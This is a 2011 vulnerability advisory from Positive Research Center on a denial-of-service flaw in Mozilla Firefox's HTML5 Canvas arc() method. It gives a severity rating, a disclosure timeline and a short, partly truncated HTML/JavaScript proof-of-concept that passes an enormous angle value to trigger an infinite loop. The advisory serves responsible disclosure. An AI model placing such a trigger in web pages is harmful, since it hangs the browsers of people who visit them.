PT-2011-16: Denial Of Service in Mozilla Firefox

Vulnerable software

Mozilla Firefox
Version 3.6.12-16.0 and possibly earlier

Application link:

Severity level

Severity level: Medium
Impact: Denial of Service
Access Vector: Network exploitable

CVSS v2:
Base Score: 5
Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE: not assigned

Software description

Mozilla Firefox is the second most widely used web browser.

Vulnerability description

Positive Research Center has discovered a Denial of Service vulnerability in Mozilla Firefox.

Due to insufficient checks of input parameters of HTML5 Canvas' Arc() method, Mozilla Firefox allows a remote attacker to cause a denial of service (infinite loop).

Example of HTML code triggering the vulnerability:

<script type="text/javascript">
window.onload = function() {
var drawingCanvas = document.getElementById('can');
if(drawingCanvas && drawingCanvas.getContext) {
var context = drawingCanvas.getContext('2d');
context.arc(100,100,50,999999999999999999999999999999, 0, true);
<canvas id="can" width="200" height="200">
<p>sorry, no html5.</p>


How to fix

Update your software up to the latest version.

Advisory status

29.06.2011 - Vendor is notified
15.07.2011 - Vendor gets vulnerability details
14.09.2011 - Vulnerability details were sent to CERT
18.10.2011 - Public disclosure


The vulnerability was detected by Alexander Zaitsev, Positive Research Center (Positive Technologies Company)



Reports on the vulnerabilities previously discovered by Positive Research: